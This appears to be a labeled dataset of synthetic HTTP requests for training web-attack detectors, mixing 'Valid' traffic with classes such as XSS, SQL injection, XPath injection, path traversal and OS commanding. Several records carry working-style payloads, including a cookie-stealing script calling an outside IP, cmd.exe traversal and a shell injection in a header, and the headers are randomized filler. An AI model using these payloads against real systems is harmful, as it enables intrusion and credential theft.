GET /14uwnorodaAdihw.html?1_yIn9opt_K=145&K4WF=hp&nhshkkVoqdraul=8&bnaaotmdnb=ooEwha9eze2o9drop%7Edtelnetprocessing-instructionconnect&O9XHD8=u&K@CXkLv31a=50885108&Tg7ne6Nszid.=607349375&ottean=qtV1nb7Y-4V&hezi8reraj=te4iSoIrsntz&vbscriptxs@mt=5990&merEes4e=6410&tfhrenlWeeq=at%3Arg%40+&tpmlrah2o=eFZcrwCv HTTP/1.0
Host: www.jh5ifa0sr.de
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: 8-Y, 2-5ckd;q=0.3
Cache-Control: no-transform
Client-ip: 92.142.53.141
Cookie: zpO=nhr;ee5dlacifeeitu=elqeA<avbscriptotmo Masri
Cookie2: $Version="46"
Date: Thu, 26 Mar 09 19:29:59 GMT
ETag: "WXSmRZq.zo.IQeA7o"
Expect: u9neob=0eduTwh
From: ohhR@ti5t.uk
If-Modified-Since: Mon, 09 Jul 07 24:46:11 CET
If-Unmodified-Since: Sun, 04 Jan 04 04:55:02 CET
If-Match: *
If-None-Match: "3CWB8K5As9tkClIIdKv"
If-Range: "SOTnn-HjMXzkJN3WFS0S"
Max-Forwards: 608
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic OXVueWFkbjo1bmxlRW50Zw==
Range: 00-,-18
Referer: /leoestsd/dqarUr/oyntua0c/ieso.jpg
TE: chunked,trailers
Trailer: Connection
User-Agent: Mozilla/5.9 (X11; U; Open BSD i386 6.9; eh-gl; rv:8.3.4) Gecko/66750745
UA-CPU: x86
UA-Disp: 949,175,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0084x738
Via: 0.6 www.Tihej.html, 2.6 www.cetbtbh.htm
Transfer-Encoding: identity
Upgrade: npstdo/2.1, Bagih/0.7, ysdS/4.0, iMl/4.5
Warning: 346 224.131.21.168 "uaifemiio3r" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 12701556330524195
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22702
Start - Id: 45595
class: PathTransversal
GET /nodeKBa0nxp_dhTE.sK/alrLnica/iM-SZ7U1C25wHD.asp?eneteolpEc=+o9ne4tV+trnwftprbpe&yewdphg=l7e1asup&odteod=1m&3niomlp=..%2F..%2F..%2FWINNT%2Fautoexec.bat&sz=rp8w&rNnr=76ttTzotwocooMa&3HiAarAl3rcAlEt=t&execBcHpxusrtelnet3q=894668235&o5ehwzpme=4056&iet2r3fhi=jsIepisg0l5ose&eI3OEie3pSueoGg=t HTTP/1.1
Host: www.tanc.com
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: xeuta-eiehA8
Cache-Control: min-fresh=872
Client-ip: 44.208.226.169
Cookie: oolx=ttorMxml ;aessbisoh4n=k
Cookie2: $Version="7"
Date: Mon, 07 Mar 05 02:07:06 GMT
ETag: "eCEkqix4L1LuKK.C8YF"
Expect: 100-continue
From: f4re3ea2@HiNl.uk
If-Modified-Since: Thu, 06 Sep 07 10:19:29 UTC
If-Unmodified-Since: Wed, 12 Jan 05 05:44:19 GMT
If-Match: *
If-None-Match: "MzcsACYnhVi0VBe"
If-Range: Wed, 26 Aug 09 16:36:37 GMT
Max-Forwards: 42
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: ench vu6n=5eeTe
Authorization: Digest opaque="6glonc"
Range: -709
Referer: /eQmlh.tiff
TE: gzip;q=0.7,gzip,trailers
Trailer: Accept
User-Agent: isisYE/7.8.2.9.6
UA-CPU: 68000
UA-Disp: 6050,986,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 5892x3688
Via: frtav/9.5 www.gmlTv.css, FTP/4.2 243.202.97.221:0663
Transfer-Encoding: lY3H8; ophnihd=eotc
Upgrade: m9e/5.3, eSsw5l/3.4, Vct7rc/0.1, hEwtE/6.8
Warning: 283 170.214.194.99 "oochsm" "Thu, 12 Feb 09 16:17:19 CET"
X-Forwarded-For: 37.178.82.248
X-Serial-Number: 90033234881
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45595
Start - Id: 8183
class: Valid
GET /ie_MljuvRc.j/cDr/n.XUGVEH/ablnkia3arrun/aotnsteu/PkF_Escriptx6o/wmhitu/zVm.jpeg?MdivstyleOz=RKgthy%3B4kde%3A&otjmpiodIilsoe=11013114&h9Bao0nm=awt HTTP/1.1
Host: 218.206.171.183
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: x-mac-roman, euc-tw;q=0.1, x-mac-cyrillic, euc-tw;q=0.0
Accept-Encoding: deflate, compress, compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: max-stale=88
Client-ip: 110.38.97.95
Cookie: asm=eeh53tynunbemilLu;dnla=shutdown rme3locationdXli;almetrheuoex=Anauado&;4tIrLvme=am3;v5hVTYeAh-uT=d>nieIiti;PpasswdVR6=shx1
Cookie2: $Version="1"
Date: Sun, 29 Apr 07 09:43:52 UTC
ETag: "CJ2FHvY_yVxe4mme"
Expect: cah1n=aakpb9;omly
From: lncsrs1@ssri.net
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Sat, 28 Mar 09 24:26:54 UTC
If-Match: "Te7XzoO2aKnqHqJ1qwsM"
If-None-Match: *
If-Range: "b8GLjyVIWsFJCdO59"
Max-Forwards: 7
MIME-Version: 8.8
Pragma: a2a6un=6rhleds
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: NTLM ZnhkSG1sbmlxd3psdWVaZWVlY3JFZTFyM0xzbnVibmNhdA==
Range: -635
Referer: /3Hlrpmo/nitNuBi/pl0n2/aprlecr.bin
TE: gzip,gzip;q=0.0
Trailer: If-Range
User-Agent: Mozilla/6.0 (Windows; U; WinNT 2.0; md-nh; rv:9.8.9) Gecko/74155704
UA-CPU: PowerPC
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 7.0 www.gmehjlol.jpg
Transfer-Encoding: identity
Upgrade: epnli/5.9
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 143.171.199.183
X-Serial-Number: 81045574594520616
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8183
Start - Id: 34319
class: Valid
PUT /xhttpsO/mHscriptbQatE/Fe-US86RlibrEiy/t8xnnrmlie/HQtD71NVboot.iniW2ysR/or1T@55988/nsDEvwWH88T-50AUrHYQ/h1cKWVZ7/5A1S5O.asmx? HTTP/1.0
Content-Length: 194
Content-Language: aedetsgo,4esauCl,Setlhr
Content-Encoding: compress
Content-Location: http://tStTgPo.cz/cg9hwsan/ah1dcox/niatTc4/eehehn.sh
Content-MD5: amVkcGxoclRiaHBzdGd5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 21 Jun 04 09:57:55 UTC
Last-Modified: Wed, 16 Dec 09 21:23:09 CET
Host: www.ncee.uk
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, identity;q=0.4, compress;q=0.4, compress
Accept-Language: ho-kairo82;q=0.1, egnorisT-s2z, i-cr, decyhe-eatts
Cache-Control: no-cache
Client-ip: 162.72.47.178
Cookie: CTUq8Kz=eu7heeoEexkOme;rm7ked6nowpieh=ta;iefvautldsyefh=neNXnciNrpoelpwoir;f3vLQC=e1p7<uaarm;r7gna3wnos2o=nherarafutreieui
Cookie2: $Version="975"
Date: Tue, 21 Nov 06 06:38:48 UTC
ETag: "oCWYxdxSE.sRjMMagk8"
Expect: 100-continue
From: viamr6@yergvcA.biz
If-Modified-Since: Sat, 20 Aug 05 17:16:56 GMT
If-Unmodified-Since: Wed, 10 Nov 04 11:40:00 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 02 Nov 06 18:55:22 CET
Max-Forwards: 5
MIME-Version: 1.2
Pragma: t5gHgh=6rverh
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM dDBvaXV0aWVlYTNjYW5hQW16ZWFiZUdwYW9sZGVic2xtaGI3M2l6ZWF1
Range: -278160
Referer: http://hI0maene.cz/nhqa/brpo/melAts.php
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/3.2 (Windows; U; WinNT 3.7; re-a1; rv:1.9.9) Gecko/89735390
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 232x3371
Via: aeTtst/9.6 114.12.34.91, 5.5 195.4.218.188, 7.3 www.fnh5.gif
Transfer-Encoding: 5spot; idtaF=saBrjuna
Upgrade: 7bns/2.9
Warning: 043 www.eepu.css "fuina4" 
X-Forwarded-For: 252.208.59.218
X-Serial-Number: 57690312658
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

MxUwinntRbgsoundW3elrmN=scdtdegeoiec&peoiy=tdmhClog uiagt)muobjectnu&rtru3H=ndeSrroe&nisna=eOtsDlWLH@g&tn=6&nNlneaxrlsAadh=275038&tn25=492841591&xLbEQreplace.i6jP=36538477&ewfazavatoeun=Ce n

End - Id: 34319
Start - Id: 47097
class: XSS
GET /er19Ltr/oerO/c1Ert3dato/fpIM1WwHy26o7QnEK2C/ss/rjyg/_LfeY/CIt/sne0wa59oierhc.shtml?3o6DY=n%40BuZN4d7Q&3nexy=%3Clink++++rel++%3D+++%22stylesheet++++%22+++href++++%3D+%22++++javascript%3A+%5Bwindow.open%28%27http%3A%2F%2F70.105.128.102%2Ficicne.asp%27%2Bdocument.cookie%29%3B%5D++++%22%3E&tn7t=esmochaaactcsed%7E&rke2=iWLHJNQf&ohdye5s5a1t=dig&oleseaa=tgbNntir&sal=locationcsit%5Dcaeou&1cr=8&enemaqhemonlv=logdnodejer%28g%26mHae4%2BP&rAffe74J=irclx&oraoasamku6d=d%26&3mh=updatesNh%5Cxditicat%3Aae%3D1siei&7ikhpsOx=381015 HTTP/1.1
Host: 233.112.93.91:80
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, gzip, deflate
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 51.141.13.228
Cookie: ceown1tunpet0o=655500694;me5uyorhpasbloe=srtrxensf6;0rerihi=29;bs9m=5464
Cookie2: $Version="713"
Date: Fri, 17 Oct 08 14:25:50 CET
ETag: "NVqARtN0JGV.Ro_eNoEv"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Sat, 07 Feb 09 16:10:00 CET
If-Unmodified-Since: Mon, 03 Sep 07 20:35:05 GMT
If-Match: "A2hlIohpIKprA8e"
If-None-Match: "Tnw7pnDlBwV9uyUb96h"
If-Range: *
Max-Forwards: 5727
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: Basic dGl6aDpkdGFweGk=
Range: 74-7756,9-
Referer: http://www.soSd.be/hoqo/oon9htlp/tcNmq4/dirar/aeai7om.gif
TE: chunked;q=0.2,trailers
Trailer: Cache-Control
User-Agent: eTwshw.v http://www.leso.uk
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 320x898
Via: FTP/9.8 www.prtgL19.css, 2.8 www.oebwa0.html
Transfer-Encoding: gzip
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 246 www.ARdz.htm "saetdtrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47097
Start - Id: 14713
class: Valid
GET /3@UnWRLviframe/mrarM2rNS/ha7TkycreE/Fmeta698O7_Yh/htpass8DzSnZyphpCiUsbody.js?aSsooEf4noi6r3l=c16&Spzntoxqhpr=rdHtAd&oo=acYrdE7cho&tDik=0404&eidecetxaer6xh=lsqez4erenn8rmrq&dn=4994449&tennagp=255&daO8ielnnf0d=+3ocx&hsoliramhfAd4Wn=0WC%40X%401&ahsted=7678&eM6iStdnErtmv=5707&igofo6=51895 HTTP/1.0
Host: www.1ehecwsq.org
Connection: keep-alive
Accept: video/quicktime;q=0.1, text/*, text/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: z5vl4tc-aht, d8dc4s-ecsshuRt, Rg-A3rr;q=0.8, mAys4-t4;q=0.2
Cache-Control: no-store
Client-ip: 218.227.164.177
Cookie: ewodAdna3vmn=natrezoesys30e0rzt;lroi= p3a;eaece1reR=deysr'zfyconnect4t(mshr;5UyRGaxb8=nxrv;rtEue=Suksrhr3aa
Cookie2: $Version="486"
Date: Sun, 04 Jan 04 05:18:28 UTC
ETag: W/"CjXd5ytRG8C2ENF8MV"
Expect: 100-continue
From: zar3wadE@0eyihva.cz
If-Modified-Since: Thu, 24 Feb 05 19:50:01 GMT
If-Unmodified-Since: Wed, 03 May 06 05:50:53 UTC
If-Match: *
If-None-Match: *
If-Range: ".KsnzQmzT1@M3MH6qT"
Max-Forwards: 4
MIME-Version: 3.2
Pragma: bgcoInq='oher'
Proxy-Authorization: Digest uri=http://tett.ch/tulLjgt.swf
Authorization: Basic aXRkbXRyVW86QVRsc3I=
Range: 07-
Referer: http://sc2wts.ch/eoi14lo/sHls/es6w.exe
TE: chunked,trailers
Trailer: Pragma
User-Agent: Mozilla/6.1 (Windows; U; WinNT 6.8; eo-t0; rv:5.3.7) Gecko/15435118
UA-CPU: x86
UA-Disp: 614,213,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 0368x227
Via: FTP/3.5 22.16.20.162:9, 8.9 247.79.230.235:70, 5.0 www.enya.shtml
Transfer-Encoding: gzip
Upgrade: ien/3.4, cti/1.8, ttyjE/5.2, rea/4.3, hkt/2.0
Warning: 558 www.ronb.png:85114 "eteaQlei6Imtxieuee" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 5935364150091795
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14713
Start - Id: 23413
class: Valid
GET /drtsEoeedEiahCsoss/iueemsfhasbxnC/pietbdatSrIznikW/VZwinntNwgetPcb-andU/yevnarEaet74iidl/OwYvmukonvvs/pR0NxRL9JQt27W1fR/OtiscirttemassRAo/XEe1X/V8Mzs0vp.asp?Nudroq4sm1Oht=iolcn&ir=aQBU5bht&eejmleaieogl=76&Ebecum5t=4180635&cNarese8qthhiIo=Nawh+Tr%3FVts&6ydieaim=uolss&n6rqietSwa=185924&hw8aLtdEpacs=ck-XzwXX&eehlndegt=4&mHYPBw=bdy%24n%40ssotceu&aIautoexecGmbgsound-Pboot.ini=itmpc&4o=3&und1euEoBine=7960&iEeerjn7P=eyPs5ioftiin%7C%5Coe%3E6&antwxA=eenVrset HTTP/1.0
Host: www.phh2.de
Connection: close
Accept: image/png, text/html;q=0.6, application/*
Accept-Charset: x-mac-korean
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 200.220.239.93
Cookie: iol9=rpe;et2oeon=3ie1iaweT8t;tiiwse0iss=location;r;FfDVaN58BeIa=4t2sbbeo3lnt6;ne8s0toNgwebpo=edtn
Cookie2: $Version="832"
Date: Thu, 22 Mar 07 08:37:22 GMT
ETag: "4GlJvF0PI@Dj9YXMxhp"
Expect: sase9
From: tyRbnd@shlch.st
If-Modified-Since: Thu, 08 Oct 09 24:33:17 GMT
If-Unmodified-Since: Sat, 02 Feb 08 11:15:23 UTC
If-Match: "DmLYZ02MIu0goqrId"
If-None-Match: *
If-Range: *
Max-Forwards: 992
MIME-Version: 5.9
Pragma: tmfnhe=AnE
Proxy-Authorization: Basic dGFpaGNvOm82em0=
Authorization: ea8a atcr6c=nmEt
Range: -14180
Referer: /c24ao/4swO.tiff
TE: trailers,trailers,chunked
Trailer: Referer
User-Agent: Mozilla/2.4 (Machintosh; U; Mac OS X 0.1; 9r-jH; rv:2.5.3) Gecko/00413458
UA-CPU: StrongARM
UA-Disp: 9336,5495,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 134x126
Via: FTP/4.9 www.iafdats.jpeg
Transfer-Encoding: deflate
Upgrade: kesgoe/3.7, tce9/6.9, aee0w/7.2, iyu/0.2
Warning: 969 190.205.124.28:1921 "Alhersnix9ottat" 
X-Forwarded-For: 95.103.231.158
X-Serial-Number: 329196523
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23413
Start - Id: 36539
class: OsCommanding
GET /file.bat/..��..��..��winnt/system32/cmd.exe/c dir C:georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 79.46.151.81
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.9
Accept-Encoding: compress;q=0.6, compress
Accept-Language: pvsi5-bna;q=0.8, av-cartze, t-onehi;q=0.8
Cache-Control: no-transform
Client-ip: 213.233.54.110
Cookie: teeb=hposition>]Edagsna;dotoaqwcrdzistl=1;mmitFsei=kLUoT1I;6aQn=srshai;il=e4csp;2Eri1Ytz=eO0pnnoht5ervawae
Cookie2: $Version="973"
Date: Mon, 31 Jan 05 02:52:35 GMT
ETag: "@ruI.MWKdtelCCfg"
Expect: 9nww
From: qslOdEWa@reveTya6.com
If-Modified-Since: Sun, 30 Jan 05 14:33:44 GMT
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "YH8pDTSMDUMrn@@zg"
If-None-Match: "DRah4eYE.S8OiDb"
If-Range: *
Max-Forwards: 848
MIME-Version: 3.0
Pragma: n0=Fqvn
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: Digest opaque="ewadeye"
Range: 9206-,968-
Referer: /ysPb/tlhriohs/hwnaeo/h14ot/bechs.mp3
TE: trailers,trailers,trailers
Trailer: Cache-Control
User-Agent: tlwaws3/2.4.5.0
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 547x5195
Via: 2.2 171.44.118.140
Transfer-Encoding: compress
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36539
Start - Id: 36671
class: OsCommanding
GET /wN@_H9YI/ia30ianeeei78/mscefnElpljnyptantc/C0WKhin1QBenPV9/kgpyE6CdFXWaNbxm/nQdq8s@_KzA/msoyhm.shtml?mEcYbodyYXJLj=dql&evalyzKt6jd=la5XRRYY0X HTTP/1.1
Host: www.Psxs.uk:80
Connection: close
Accept: application/zip, video/*;q=0.5, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, identity, gzip
Accept-Language: '     ;     cat  /tmp/resmail    orar@ti.com  ;
Cache-Control: no-transform
Client-ip: 199.3.230.74
Date: Tue, 10 May 05 08:46:48 CET
If-Modified-Since: Wed, 20 Jul 05 10:19:52 GMT
If-Unmodified-Since: Sun, 24 Jul 05 14:30:15 UTC
If-Match: "9@pX57CchNp9si1QCv0"
If-None-Match: *
Max-Forwards: 0
Referer: http://icw08r0L.be/ncseuium/lw9dTh/aoBsm.pl
TE: trailers,deflate;q=0.8,chunked;q=0.9
User-Agent: Mozilla/7.0 (X11; U; Open BSD i386 5.4; e6-p0; rv:0.2.1) Gecko/48956096
UA-Pixels: 211x4085
Upgrade: k21de0/3.9, tcu/7.2, 6go/7.9, sirla/2.0, elb/6.0

null

End - Id: 36671
Start - Id: 42016
class: SqlInjection
GET /pV3hhvoSJBxC/deu7nr4gpuo/meine/eeserll/nZ42j/Q_UXservices-/t6inaehhfimseprBeOoo/Atsuaoyo4vis.asp?@fsk_=3287043670&ti=a2N4bw_2m&nbRhde=%3B%3E3+&hlhn=%27%29+++UNION+ALL++SELECT+tdx++++%2C++7es9ihe+++%2C++Eirget0t++++FROM+ooEmR5++++WHERE++++cevVdCnio++++NOT+++++IN++%28%27deaeulZxes%27+%29++++AND++Esbteuro++++NOT+IN+++%28++++%27hwtZmuyi%27%29+++++AND++%27%27++%3D+++%27&a4T=561079 HTTP/1.0
Host: www.yfedAm.com
Connection: keep-alive
Accept: audio/*;q=0.4, audio/basic;q=0.4, video/mpeg;q=0.6
Accept-Charset: utf-7, iso-8859-1, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: nheE-urye3, eoai-n44;q=0.9, bu3-piE;q=0.4
Cache-Control: no-store
Client-ip: 209.185.53.108
Cookie: sq5dhnuolts=To%mp;hyrvKy=es$nnt;Mi2hkll=tqAGo.xn8WSo;amsnh9=557;cmd4tmpAlsU4tCgG=a9tHanjLiowate0;Nmyvq=desjna1ee
Cookie2: $Version="334"
Date: Wed, 11 Jul 07 18:21:52 CET
ETag: "RNqO_dyGb@AGbsbMlT4j"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Fri, 01 Jan 10 05:18:40 CET
If-Unmodified-Since: Tue, 23 Jun 09 16:42:45 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 31 Jul 09 22:02:34 GMT
Max-Forwards: 26
MIME-Version: 2.8
Pragma: i9Icekiy='et'
Proxy-Authorization: iaijaB rjera=cnidom
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: http://Dsuaw.org/se9aawO/intvltN/nid8zfh.pdf
TE: trailers,chunked
Trailer: Trailer
User-Agent: mrZp-Kzc http://www.dsieeo.be
UA-CPU: Sparc
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: 5.3 187.240.199.198, daur/6.7 www.alsghztw.js:90114
Transfer-Encoding: deflate
Upgrade: 1ra/6.0, 2yNai/3.3, a1ejc/1.5, osRwie/7.4, e6bte/5.7
Warning: 583 www.veos.jpg "tedi" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42016
Start - Id: 17307
class: Valid
GET /tV3Q@nO7fdxd8hhG4/nUdmzH/s0aSP6c77/JhB7/iaQJAEfMKbH/h0tisl0dossc/ss0hrgirrhWT/hAHVc/ig-l_xXrZaf5B.nsf?hisumoevjchahw=085&saaE0h=huhgoowt&t6ny7Cameep4ci=5805290&ithYn2is7ihw=3&@mF6drcpukWvXe=srsetiosnti9es&et=lie3&loafehaoNe0ir=roxr3mochaj2ctnl&hdddasmybum=0fcn++%25t1y%5Benr3&vzdsouryranh=5c&ZL8@cmd6MnEv=812&nsTzs2jrt=ve&dleunrBiha=3260591320&dDi7gsaoja1emlt=opent%3Bby&su=homes%28R&group byzShs0KNn3=2gvh HTTP/1.1
Host: 46.192.123.119:9
Connection: close
Accept: audio/basic;q=0.5, text/html;q=0.3, application/*;q=0.0
Accept-Charset: cp-950;q=0.1, iso-8859-6, x-mac-cyrillic, x-mac-greek;q=0.9
Accept-Encoding: 
Accept-Language: pftarD3w-hp8ac;q=0.0, oe-Rrt
Cache-Control: max-stale=83
Client-ip: 73.229.13.182
Cookie: iiPinAstdgv7Tt=135;vleeteesmmahiun=uuCtYsqSiI;msn5ba6=dfta;ptimA=7i79oqpnnatyosl2mS;tiOu=rotbridGt4tyiswe
Cookie2: $Version="1"
Date: Wed, 10 Feb 10 19:41:56 CET
ETag: ".J_WMiVIJEBLG19"
Expect: 100-continue
From: insBIg@emorhZ.de
If-Modified-Since: Sat, 23 Oct 04 21:00:28 UTC
If-Unmodified-Since: Wed, 17 Oct 07 02:55:15 CET
If-Match: "aZ5Up1IOwU8g8italkB"
If-None-Match: *
If-Range: "WnL.8rJeBFhmuJ_QB8"
Max-Forwards: 10
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: eEaEe8 ogho=3YTrbs9
Authorization: eirux knieeo=9h8tlf
Range: -03,4-133137
Referer: /cI9esi/rnrem/9omh1t/yl4ledPb/Ovn4rdt.tiff
TE: trailers,deflate,gzip;q=0.5
Trailer: Pragma
User-Agent: ulqaymes (amzFGd; r0v.m_sgxs; r@lBcxk)
UA-CPU: Sparc
UA-Disp: 8556,725,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0027x5589
Via: temeRg/5.0 203.98.115.160, oeh/0.4 www.ajes.gif:57057
Transfer-Encoding: deflate
Upgrade: ikwg/5.7, sm8ess/6.1
Warning: 113 www.scrt.css "niweICl" 
X-Forwarded-For: 105.119.73.45
X-Serial-Number: 835471798337
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17307
Start - Id: 43686
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: www.dhttla.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: pnpai-otrttn, oiaEev-aho3zju;q=0.9, uo-Estrnhyu, 1rpNlg-a;q=0.0
Cache-Control: no-store
Client-ip: 149.80.234.160
Cookie: pqtqeOtm5u1fta=438934;frctfnL=o\5iyun;w;stuesheGv8oa=74746;rdmto=i;Lmvo=ageh5tpcn
Cookie2: $Version="4"
Date: Tue, 09 Dec 08 03:53:29 UTC
ETag: "Ypk8OsVE4.PySPp"
Expect: 100-continue
From: o68nO@tetn70i.cz
If-Modified-Since: Thu, 06 Sep 07 22:27:26 CET
If-Unmodified-Since: Sun, 01 Oct 06 06:42:34 GMT
If-Match: "w@QVjMuwwxTIbtY6"
If-None-Match: *
If-Range: *
Max-Forwards: 83
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic cWlyaWNibjplb241ZWdp
Authorization: Digest algorithm=MD5
Range: 0932-655,7-822597,-7
Referer: /L0gstv4/gnouot/itooluS1/orieynwr/wl0srt.conf
TE: chunked,trailers,chunked
User-Agent: Mozilla/0.1 (Windows; U; WinNT 7.1; vw-ru; rv:0.9.6) Gecko/53471808
UA-CPU: PowerPC
UA-Disp: 0760,6921,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 827x275
Via: 6.8 www.nntaotsn.html
Transfer-Encoding: compress
Upgrade: akEzd/2.3, jeaovc/8.8, iti/8.8, Yya3/8.2, lrscJp/3.7
Warning: 965 www.lhcrhue2.jpeg "khnjidedehslccnwsp" "Tue, 25 Jan 05 20:48:31 UTC"
X-Forwarded-For: 163.232.189.112
X-Serial-Number: 181822248668347
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43686
Start - Id: 49089
class: XPathInjection
GET /ek-D37IM/2TLekkstG_KDtDP/obEmVncxj1l64O3T/dBRpMynd9YqL2SOQ/ghUsmtrh/tGBTcPdnbKUGih0RZ0/grisi78jveP_CzY2a7/nLZ6Mxterm01bupdateelUsD/owfM1A8tO/eN6WuYBBEekJJqGh.pl?McopykaT=tlea%27%5D++++%7C+++++P++++%7C++++%2F%2Fuser%5B+++name%2Ftext%28+%29++%3D+%27dlr HTTP/1.1
Host: 75.227.48.98:80
Connection: keep-alive
Accept: audio/basic
Accept-Charset: koi8;q=0.0, windows-1258;q=0.2, macintosh;q=0.6, iso-8859-7
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 83.185.68.24
Cookie: oe5lktaHmut=ol;wikqinuaAn7r=yWhhJUw-7B
Cookie2: $Version="21"
Date: Tue, 19 Jan 10 13:57:05 GMT
ETag: "9zbdhmHRPBJn6NucEb"
Expect: uotniqud=2tuam1Po;Hd2ei
From: eynba@e3yzoc.com
If-Modified-Since: Fri, 16 Feb 07 09:36:27 CET
If-Unmodified-Since: Wed, 19 Sep 07 08:41:47 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 Nov 05 20:50:30 UTC
Max-Forwards: 0
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: TxKj ysmsznno=icasui
Authorization: 2ipAia yi2t1Oap=ceesw
Range: -21
Referer: /weoOn/4hRsavr/rkIualnt/tenes/rewiec.rar
TE: deflate;q=0.9,chunked;q=0.7
Trailer: Upgrade
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 8.9; le-ce; rv:3.9.3) Gecko/79989265
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: nut/9.8 193.223.151.10:98059
Transfer-Encoding: deflate
Upgrade: mtodno/2.6
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49089
Start - Id: 48834
class: XPathInjection
GET /nIPZIMrt6/oDzpyUKgK0V6h/tatpertta4z/tH@.grh1JI6sGtJ6Hv/pcatiAAiqeW/gm/tH7z/khi/sLvDtMhsTXA/am/9cqjkhpohwuT3eL/PHYkUgroup by..html?hywvh=h%2Ftj%2Fmefkei%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D2%5D++or+++++%27uas7%27+%3D+++%27 HTTP/1.1
Host: 216.134.30.135
Connection: keep-alive
Accept: application/*;q=0.4, audio/*;q=0.5, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tvnaQdva-cgrn
